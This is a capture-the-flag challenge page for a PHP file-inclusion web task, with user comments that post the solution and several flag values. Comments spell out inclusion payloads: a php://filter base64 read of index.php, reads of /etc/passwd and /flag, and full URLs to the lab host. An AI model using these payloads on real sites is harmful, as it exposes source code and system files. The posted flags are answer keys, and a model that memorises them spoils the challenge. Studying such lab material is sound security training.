文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13803
提  示:
描  述:
flag{}
评论
zh2i 2年前

回复 0
YUMEKO 2年前

过分了,谁都知道是伪协议

回复 0

EtHat 2年前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 2年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 2年前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

nicchanggh 2年前

flag{e92c0ec08be5fc7e0bd706e697e366fd}

回复 0

chushou 3年前

flag{ebfea7aca0bd16bb5819c678090ff026}

回复 0

107zsm 3年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 12

小夫 3年前

file=/flag

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

亚洲 攻破了该题 5小时前
TohsakaRin 攻破了该题 15小时前
anbd 攻破了该题 1天前
李政 攻破了该题 1天前
WWls= 攻破了该题 2天前
michelle123 攻破了该题 2天前
hotwind 攻破了该题 2天前
小爱莉希雅 攻破了该题 3天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
fl4y 攻破了该题 3天前
青春小豆 攻破了该题 5天前
cheat 攻破了该题 5天前
AWDAI 攻破了该题 5天前
Terrenc44 攻破了该题 5天前
耶无忧 攻破了该题 5天前
jvfnvd.vl 攻破了该题 5天前
niubill 攻破了该题 5天前
Star666 攻破了该题 6天前
whshkdh 攻破了该题 6天前
问题反馈